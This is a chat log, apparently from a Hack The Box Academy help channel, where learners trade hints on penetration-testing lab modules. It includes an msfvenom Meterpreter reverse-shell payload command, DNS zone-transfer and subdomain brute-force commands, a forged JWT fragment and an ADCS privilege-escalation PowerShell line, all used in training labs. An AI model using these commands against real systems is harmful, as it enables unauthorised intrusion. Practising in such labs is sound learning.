There is another non standard port. Did it quite recently, and a full port scan revealed it to me.

ugh. I believe you. I just know this machine is also wonky, so half the time it only gives you standard open points. I think I'm on respawn 13 now, andd it reveals 1 open non-standard port.

i like my macbook a lot. It's atleast unix so the terminal crossover with linux is helpful in that sense. It is not by anymeans necessary to learning nor will it make it easier. Like Marcie said the new chipset doesn't play with everything as easy but I haven't had much trouble these last few months since switching.

yeah . but the macbook is so expensive. 😄

that's the other thing.

I certainly didn't need this machine, but i like it a lot and the battery life is killer.

It's a nice computer objectively speaking. I'm sure someone will tell me Im wrong. But with Surface vs Macbook pro it's like a matter of preference imo

I just want a system I can customize, that’s it. Some of my friends say MacBooks are hard to customize. Is that true?

to an extent yeah, you're dealing with Apple's walled garden.

certainly not what you'd get using linux, but if you're doing HTB you probably wouldn't be connecting from your macbook. It's best to use a VM (I could be wrong) or the pwnbox with your web browser

What sort of customization are you thinking?

either way, if you're thinking you want to get into things deeply I'd look else where. Saves the money too.

Stuck on the last question of manipulating the model under introduction to red teaming. If anyone can give a hint on what to exactly look for that would be great

in Signature Wrapping Attack I've tried to inject my modified assertion in the original SAMl payload like in the module , but it didn't worked ,I didn't beautify the code, can anyone help me?

#boxes

Hey group, I am having an issue I cant figure out. On module Meterpreter Tunneling & Port Forwarding. Making a payload: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=8080 -f elf -o backupjob (running on the pivot host)
And running multi/handler on local msf, I am getting : The "stdapi" extension is not supported by this Meterpreter type (x64/linux) . I tried both meterpreter_reverse_tcp and meterpreter/reverse_tcp. The syntax of the msvenom is correct, and on the handler, I have set the payload the same. IT makes a connection but doesn't allow for command executions.

Nope that's illegal

https://i.imgflip.com/9n7rvr.gif

so just wondering but whats the difference between the cbbh and cpts exams?

hii can anyone help my friend recover her Instagram account??

hahahahahhah

Nope we're not tech support, go contact instagram support

Would love some help with :https://academy.hackthebox.com/module/158/section/1428 . i cant get a Meterpreter session for some reason, getting ailed to load extension: The "stdapi" extension is not supported by this Meterpreter type (x64/linux)"" . I tried a bunch of different payloads, all are getting the same error. Tried linux/x64/meterpreter/reverse_tcp , linux/x64/meterpreter_reverse_tcp , linux/x64/meterpreter_reverse_https , all are getting the same error

Hi! Quick question:

If I upgrade my subscription to Gold right now, will I immediately receive the 500 cubes, or will they only be credited after my next billing cycle starts?

As long as a subscription is active, you cannot take out another subscription

CBBH: https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter

CPTS: https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist

Also, if I buy a Gold subscription, unlock a module using the 500 cubes, and then cancel the subscription afterward, will I still have permanent access to that module?

Yes

Modules you unlock with cubes are permanent according to the FAQ

Thanks!

Also modules you complete with the access based subscription are reviewable too and cubes you unlock for completing them are yours to use on whatever you like

So you could build up your cubes with access based then use them for the higher tier modules

hey is anyone able to help me with Footprinting module, section MySQL, question 2. The email for the answer i have isnt showing up as correct. even if i check the walkthrough the same answer shows up as incorrect?

504 Gateway Time-out

https://academy.hackthebox.com/module/109/section/1033

Same for me

I'm having 504 gateway timeout

might explain why my answer wasnt submitting haha

Where should we submit the ticket?

I guess we wait

Looks like everything's back to normal now.

yep

Alright, back to the grind!

Is it me or the pwnbox and the targets are having issues, lag, connectivity issues, freezes?

robots.txtx

What?

Anyone available for a hint on AD attacks & Enumeration skill assessment 2?

Depending on where you're at you'll hate this
Welcome1

Hi, I am doing skills assessment regarding NTLM relay attacks and I am stuck on question 3. I got the hash of the machine from question 2, tried to coerce the sqlbox but no success. But I am lost what to do next to access SQL machine. Any direction is welcome

I'd use that account to enumerate shares.

Bummer

Would like some help on NoSQL injection SA 2, is anyone available?

guys, I'm doing info gathering web edition and on skill assessment, I was asked to crawl and submit the found mail, but the crawling showed ntg but index.html

Then dig deeper, subdomains, subdomains of subdomains

Can anyone help me with module 57 section 491. Have the username and password for both users yet I cannot log in to the ftp service to get the glad

Flag*. It isn’t connecting and this is driving me up the wall

I can feel it

i've got a new sub sub domain

but all it has it counless random order indes-1-1000

it's best to say the module and section name instead of the numbers

prolly, and I tried dir busting the new sub.sub.domain and no leads

are you using the spider tool given by the module?

yea it's curntly running

it's taking a long time, is that it?

I'll try to restart and run this again if it's the way cuz I'm w8ng since 15 mins

Login brute forcing Medusa web services

I’ve been trying to ssh in and ftp in using the usernames and passwords that I acquired and nothing is working

I’m getting a constant “connection refused”

Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.

If there is 6 bytes in the string, would it mean there needs to be 10 bytes of padding? so 00000000000000000A, so why doesn't this answer work ?

Hi everyone hope you are doing well, ive one question! currently im doing attacking authentication module and currently on jwt algorithm confusion attack. im doing the same steps like mentioned but its throwing error. any help will be appreciated. python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTc0NTg1ODI5MX0.<SNIP> ASIYNejb12GEuZjhVNZ0oyqgqUbVOtipqdiiZyZ02A7Zl24rOxiZCkD-iudtSSccWBKFZrzLwWHIegYAbmc1-qleXZ1UOGU4hDXq4iucdZfxnXQnlIFHZc7V0PMlUtjtvuecppcCyYQMlCJ-TYyU6dslJoiMsk7O0ITdMvUmMwtztukKfXvXZ6bUX4ZZsFYh1eRgb20l04LAMLWyVFsVEYOa-CH5eyFb5lqgZRoOGSeL-D--mecWVJkwGY4ogx8XSh2RVxkT1SlkdTZ6cQ4wns94zEpjAO4xvgk0-0jAgk1ME8-VfFAfgWEK6WIJXbI8dgBZSa14WqSyBj9nyFek9w<SNIP>

Dann

What type of files do Android Runtime and Dalvik VM execute?

guys whats the andwer for this questions

@everyone

Don't tag everyone....

Hey I need a little help in bash scripting. So the module gave me this asks me to: Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

And my solution is this:

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo $var | base64)
if [[ "$var" == "$value" && ${#var} -gt 113450 ]]; then
echo "Last 20 character: ${var: -20}"
exit 0
fi
done

but the answer isn't right. (NVM SOLVED IT)

Do not click that link. It’s fake

i need a mod

yeah I know

Why do you need a mod?

I meant for the guy

Ahh okay! Thanks 😄

Next time, just ping [at]serious rule break

okay

Thanks 🙏

Anyone know how to fix this?

can you give more context

You're given an ip:port yeah?

In order to ssh in you need to specify the port

Ftp is running internally on that container

also make sure that on that port there is an ssh service

If I'm recalling the exercise correctly: there's an ssh service running on that port that you connect to to then attack the internal ftp service

Would like help on Blind SQL inj module, anyone?

Been stuck here too, how did you manage this ?

Keep getting this error no matter the payload

Any one have any success with question 2 of the the Android Emulators section of Android Fundamentals?

hi team
https://academy.hackthebox.com/module/112/section/1067
for the SMB part of Footprinting, i'm not able to get the version of the SMB server. it says to submit the entire banner but whatever i submit it's not taking. i've done all the other questions on the module but for some reason it's not accepting my answer for the version

hmm

Without giving it away I believe the format is <suite> <daemon> <version>

<samba> <daemon> <x.x.x>

i submitted that as the answer and it won't accept it

You can dm me the answer that they won't accept, I'll compare it against mine

I've identified a vulnerability in one the modules that requires "make" to compile. In the case of this particular module, the "make" command is not available on the target. Does anyone know of a method similar to gcc --static that would allow me to compile the exploit on the attackbox and still execute it on the target?

Any one have any success with question 2 of the the skill assessment section of Android Fundamentals?

Would like some help on AD attacks & enum skill assessment 2.

I'm at the final stage of the assessment, just need a little push

File Upload Attacks -Blacklist Filters module target instance wont spawn

Ofc right after I send the message it wants to work

Disregard lol

Does anyone know why cyberchef's url encode produces different output from burp's ctrl+u url encode ?

It's not different, burpsuite encodes spaces as +, cyberchef uses %20 instead

No, cyberchef considers all punctuation points special characters, like ( ) \ etc

Ye, didn't notice that first, I usually do encoding in custom scripts using safeurl encoding

Then again when i try to hex decode it gets only half part correct

Hey everyone. What is a good channel for the questions regarding active boxes?

#boxes; read and follow #welcome instructions to access

hi for the last question of the Web Server Pivoting with Rpivot section of Pivoting, Tunneling, and Port Forwarding module I got the connection to the server so now it can't load the web page to get the flag. it says "page not found" or whatever. can someone help me? I'm following the instructions exactly

I got the connection to the pivot box

but the target server on the remote network won't connect for some reason

What proxychains are you running?

I tried the private IPs ending in 129 and 135

and it does nothing either way

You can DM your command if you'd like.

ok I will DM you

hi if I run a server on 0.0.0.0 is that an issue if that's the IP the instructions use?

or do I use the IP of my attack box?

0.0.0.0 is a wildcard for all interfaces

then why are instructions saying to use that?

¯_(ツ)_/¯

ok

well, that's not my issue then

Thats just what 0.0.0.0 does

@gray yacht is helping me with this particular section when he gets home in 30 or less now

so I'm gonna wait for him

I'll get it working

I'm sure I'm generally doing the section right

its probably an issue with the section this time and not my fault

but we'll see what the issue turns out to be. I'm fairly confident this will be resolved by the end of the day.

So I'm not worried. Anyway, I think I'm starting to get it a little more when it comes to the section

I got the flag

section completed. I knew I was gonna have it finished by the end of the day.

Hi, I am doing the Pentest in a nutshell module and im stuck on a question if someone can help, its in the windows system enumeration section, its the question that says what OS version doe winpeas report, however the systeminfo.exe is access denied and all the versions ive tried are the wrong answer? can someone point me in the right direction.

In password attacks AD module, I created a shadow volume but it seems not to contain the dit. My user is a domain admin. anyone able to point me in the right direction, because for whatever reason it seems like I don't have writers here. Contents of shadow copy set ID: {6170bacc-f91b-4daf-8a41-0315f21f9cb9}
Contained 1 shadow copies at creation time: 4/28/2025 3:15:22 PM
Shadow Copy ID: {cae793b6-cd5c-43fd-b859-aa85df4d53db}
Original Volume: (C:)\?\Volume{da2aad9f-e76b-4d77-a2ee-d53dd4c3c8a1}
Shadow Copy Volume: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: ILF-DC01.ILF.local
Service Machine: ILF-DC01.ILF.local
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers, Differential

hi friends.

https://academy.hackthebox.com/module/112/section/1069

for the DNS section for Footprinting, it's not giving me the TXT record? i don't think. the command i'm using is

dig axfr <domain> @<target_IP>

i have also tried

dig any <domain> @<target_IP>

Which Module and Section? Have you executed your shadow copy with diskshadow?

try the zone transfer using the FQDN

i tried that as well and it doesn't give me anything

the command used

dig axrp <FQDN> @<target_IP>

axrp ?

the FQDN used is the one given on the first question

i also did dig any

fqdn @ target

I don't know what axrp is did you mean axfr ?

sorry yes axfr

try all the subdomains you find 👀

thank you got it ❤️

how long does it usually take for the wordlist in the same module to give me the answer?

i'm brute forcing with the same wordlist in SecLists

dnsenum --dnsserver <target_IP> --enum -p 0 -s 0 -o subdomains.txt -f <list_here> <FQDN>

okay so i did it with all of the subdomains but i wasn't able to get the final answer

subdomains of subdomains

also; a more fierce list

i tried everything i could find and there's only 1 that lets me do it

and that doesn't give me the .203 thing

i think?

using the right wordlist might help

:p

i used the same one in the module

use a different one

unless i should be using something else?

this is the hint

isn't the 110000 the most fierce one

i'll try the 5000 and 20000 one!

think more about the word than the amount of words in the list

i'm not sure i follow. i tried the combined list. bitquark's list. deepmagic's list. the subdomains-top1million 5000 20000 and 110000 list

there's a wordlist with the word i hinted in it's name

i aint that smart man

😉

the service and you winking has me hollering

ty friend

I have an extremely basic question that feels dumb, which is I'm on the Windows CLI module and specifically in User and Group management and I can't get the commands to work

Every Active Directory command yields:

Get-ADUser : The server has rejected the client credentials.
At line:1 char:1
+ Get-ADUser -Filter *
+ ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Get-ADUser], AuthenticationException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.ActiveDirectory.Management.Commands.GetADUser

Even an initial Import-Module ActiveDirectory ends up with

WARNING: Error initializing default drive: 'The server has rejected the client credentials.'.

I don't think this is intended because the solution sheet just says to do Import-Module followed by Get-ADUser. I tried a bunch of things like start-process powershell –verb runAs and searching, but everything I can find online is like "right click and run as administrator on the client computer then connect to that" (and this module neither covers RDP nor does RDP appear to even be functional on this particular box).

The htb-student user is definitely in the Administrators group. And I even tried scuttling and remaking the box.

run the command prompt/powershell as admin

windows and even linux CLI handle things in a specific way; as the user shell you are only permitted to do things within a basic user context, not an administrative context

ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.ActiveDirectory.Management.Commands.GetADUser says auth error so run as admin!

it's why if you want to run around in an adminstrative context; windows requires the shell to be run as admin

how would i accomplish this via SSH? it's why I tried runAs and some Enter-PSSession stuff

as far as RDP not working, that'd be odd but i don't recall having that permission issue when i was running that module

the problem with stuff like runas; is that it will attempt to run an interactive window shell with the process

https://superuser.com/questions/522749/using-runas-with-administrator-account-versus-other-admin-accounts

... i figured it out and my error was very stupid
the question was very subtly using mtanaka as the user instead of the usual htb-student but i didnt notice because the password was the same as always and every other step was as htb-student. actually using the correct username fixed the issue lol

ah, layer 8

Working on the Final Assessment of the Broken Authentication Module. || I enumerated the users and brute forced the password. I'm having problems brute forcing the 2fa pin. Am I on the right track? ||

If brute force doesn't work, think about other things you can try.

Hi guys,I wanted to try out some modules from cwee and the mobile static analysis course.

Would you guys recommend me buying the platinum or gold sub?

If you just want to try out a few modules, monthly might be better. Can always switch to yearly.

i'm guessing it's becuase it's a service account and not a user account?

dm

ok thanks for the suggestion

wow i'm blind

one other thing, how can I run an admin cmd prompt if I'm not part of any admin group

whoami /priv

I think you have SEImpersonatePrivilege iirc

even with a admin prompt I dont have that priv

maybe the box is setup to where SeTakeOwnershipPrivilege gives me an admin prompt?

check whoami /all

?

is disabled though

I remember seeing a blog saying that even it the priv is disabled, you still have it regardless if it's enabled or disabled

idk though, never verified it

you should be able to own any file with that no?

they cover how to enable them

They're asking how come the account can run powershell as admin
-# despite not having the obvious admin perms

which module is this?

privesc?

i think you can limit privileges on local accounts

Windows Local Privilege Escalation if i had to guess from the machine name

yeah i think so

that's above tier 0 so unfortunately @quiet halo you can't post content from modules above tier 0

It should still show I'm part of the local admin group at least, no? if I can run an admin prompt

im not exactly sure how it works but youre not really an admin though it just says that to elevate your privs

i just tested using the Local Security Policy app and a low level user i just made

what does this mean

so it's sort of like app locker where it gives you access to specific things?

who's they

yes its where you can assign privileges to users

the module

@quiet halo Please stop posting content from modules above tier 0.

@quiet halo the last one

that wasnt from the module, it was my own computer

alright

kinda having problems on shells and payloads as eternal blue isnt working for both variants

nvm

we good

Web Attacks {Blind Data Exfiltration}
Not getting the flag even if i did follow the walkthrough (filename & url and my ip is configured correctly)

Anyone know of an easy way to install an older version of PHP in Kali, preferably without having to build from source? working through the type juggling exercises and the PHP versions that come stock with Kali and Pwnbox are too new to work with setting up a debug environment for these exercises

spray

hey guys, while I'm trying to submit the plugin ID for "What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan? " in Vuln assessment - Nessus skill assesment, It's giving me wrong answer

i found only 1 high criticality vulberability in the report mentioned but, it didn't work out, I ALSO had to try other plugin ID's but nothing worked

also for MODS, "What is the name of the vulnerability with plugin ID 26925 from the Windows authenticated scan? (Case sensitive) " question in the same module should be changed to "Windows basic scan instead of windows authentic scan"

What is the name of the vulnerability with plugin ID 26925 from the Windows authenticated scan? (Case sensitive)
Use google search for the above question you mentioned

are u visiting nessus using localhost or target ip?

target IP

i heard people say that some vulns come in when they ran the scan on their own try it maybe

okay

thanks!!

easiest workaround I found was to just set up an ubuntu 20.04 vm

Hi, Im starting out the penetration tester job path and was wondering how important is the "penetration testing process" to the final CPTS exam? I understand it provides industry experience on how an actual pen test happens IRL regarding laws, assessments and documents but how applicable is it to the final report? am i suppose to produce every single document?

There's a module about how you document your pentest that explains what you are supposed to actually provide in the end. It will be a list of vulnerabilities you found as well as a attack chain that allowd you to compromise the whole system. You can also look into the exam report template already to see what fields you are supposed to fill out

hey guys whats up i have trouble with Skills Assessment - File Upload Attacks. When i start Burpsuite and sen the POST request to the Intruder and set all Payloads he doesnt give me anything back. I tried it many times. CAn someone help. MY steps which i do is 1. CLearing the Payloasds 2. Marking the §.jpeg§ 3. Copy the Extensions List 4. Removing the URL ENCODE then starting the attack

I have a question regarding the payment of the subscription...is it possible to include a VAT number in the invoice for tax purposes?

Please reach out to support.

@supple star please read #rules

And how can I do that?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Could use a nudge for Blind SQL SA, cant seem to find it. Tryied the cookie fileds and the post data on login.php and index.php

Hey group, does anyone know what could cause meterpreter reverse_tcp error "Failed to load extension: The "stdapi" extension is not supported by this Meterpreter type (x64/linux)" . It works fine when i do it from the PWNBOX but when I do it from my VM with VPN i get the error. THe parrot and msf are both the same version as the ones in the PWNBOX.

has anyone managed in ADCS attacks module, to exploit esc7 from windows for a question?

(basically how to run this command:
Get-CertificationAuthority LAB-DC.LAB.LOCAL | Get-CertificationAuthorityAcl | Add-CertificationAuthorityAcl -Identity "blwasp" -AccessType Allow -AccessMask "ManageCertificates" | Set-CertificationAuthorityAcl -RestartCA
where it required elevated powershell (which in the section we do not have)

can anyone help me, please, with Nocturnal.htb, what should I do?

manually found tracking id but cant do with sqlmap

Is there a good resource anywhere that explains how this algorithm does padding? TLS_RSA_WITH_AES_128_CBC_SHA you'd think if you had 6bytes and you padded with 10 it would be the answer

You're in the right place, but I'm not sure if sqlmap is the right tool

Proceeded to the next injection point of the SA and sqlmap doesnt work there either

The module shows you how to exploit the vulnerability

Hello, i am doing the Network Enumeration module where i have to map a company network without getting blocked which i track with the statuspage. Upon checking the page, i have 50 alerts already and i havent ran any enumeration yet. Is this normal?

Sure, on a manual way but also suggest sqlmap to avoid all that fuss, why doesnt it work though?

Sure did on all the other exercises throughout the module and did exploit the fact that it did to avoid doing everything manually

Because automated tools aren't perfect, they have limitations, especially with edge cases.

Hi Guys I have some kind a technical problem. I am doing Attacking Common Services and I found out that I can't scan their targets from my kali. It shows me that host is down and appears up only using -Pn flag in nmap. More, when doing attacking FTP I guessed the port but I can't connect to the server. I tried out it on their pwnbox and in pwnbox it works fine but not in my kali? What can be the problem?

Do u use a private VPN?

no

I am working from virtual machine but vpn is their

their vpn file

It happend to me also manytime so i installed Parrot OS direct and since then no problem more. But manytimes i had this sameissue from the VM and needed to reset the machine and set new VPNS and after a time was it working

and take care which VPN is connected sometime i start the lab_machine instead the academy 😄

No I am sure that this is academy vpn but possibly yes I will kill kali and download parrot os

In the information gathering module, i’m in the skills assessment trying to use go buster for vhost enumeration however it gets like 40% through the wordlist, spits out an error then my network stops working

(Attacking Common Services) Just to point out, providing a resource with a username and password list, but not including the correct password needed for the skill assessment, is honestly crazy

Hi guys, is Anyone available for a sanity check regarding on MSSQL, Exchange & SCCM skills assessment? I managed to get a reverse shell from DB02. I would like to confirm if I am on the right track. Thanks

don't reveal info for modules above tier 0 @fading olive

also: if a user/account is an administrator, they'd have access to administrative commands.

isn't masking commands sufficient to not be revealing info?

no

since anyone can click on them and reveal it anyway

Yes but doesn't privilege escalation count somehow as a vulnerability? If you're log admin on my system you shouldn't be able to get to any other kind of admin should you?

the administrative group that the account you have is a part of has specific access to certain tools; it's intentional access to those tools

ok ok

Also, I had another question which, I hope, won't reveal too much. In the next part which is AEN > Post-Exploitation Persistence, you're supposed to escalate privileges again and you find yourself being able to run a certain GTFOBin as sudo. This GTFOBin is supposed to be able to grant you a reverse shell as root if done properly as per the doc at http://gtfobins.github.io and I haven't managed to do it and I assume that it's impossible since that's not what the module does either, and I wanted to know how you're supposed to find out that you can't use this method? Trying it and seeing that it doesn't work? Or have I just not done it properly?

Have a general question regarding modules. Since I am newish to python / pip/ pip3 /pipx / python3 -m venv.
when kali is a major version some people use and Kali pip install is externally managed, why is there not a walk through as part of the module that shows how to setup the venv or pipx so we can get a "correct process" to work from in the future when we have the "externally managed" issue? for some reason I can't get my head around the venv vs pipx install process

hello guys i was doing a module from tier 0 and got myself stuck in a simple question can you please help me with that

We can't help you if you don't ask the question

Module - section
Issue

Pentesting in nutshell - windows target- here i was supposed to do a nmap scan of the given target machine, and answer few question and i did but the one question that got me stuck is it asks how many tcp port are open in the given target and as according to the nmap scan there are 9 and on 1 service nmap couldn't detect it really, which makes the answer either 9 or 10 ig but none of that helped me

Did you scan all -p- orts

yep, did exactly as same as given command

in the module

is this the correct channel to post questions regarding a specific module in the cpts path? #cpts

This is the right channel to ask module related questions; #cpts is for questions regarding the exam/prep rather than the modules

ok thanks. I am having an issue with the oracle tns listener footprinting. I keep getting this error when running odat.py then after this error if I nmap 1521 I get filtered.

I don't see an error here

I tried so should I stop or continue without asking?

Continue without asking

ok thanks

help?

is there a reason why if I hit stop and then did nmap it would filter the port?

Likely too many concurrent requests, filtered doesn't mean blocked btw

ahh ok thanks

hello guys i need help in this question , i have got the backup.vhd file how to access it ? Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. , attack password , hard lab

Hello Guys I have a question in Attacking Common Services I discovered FTP username but medusa doesn't want to discover a password from the list provided

no match

what can be the problem>

??

this is attacking ftp section

Have you tried using other password attack tools?

Perhaps?

trying hydra now

no even the hydra doesn't help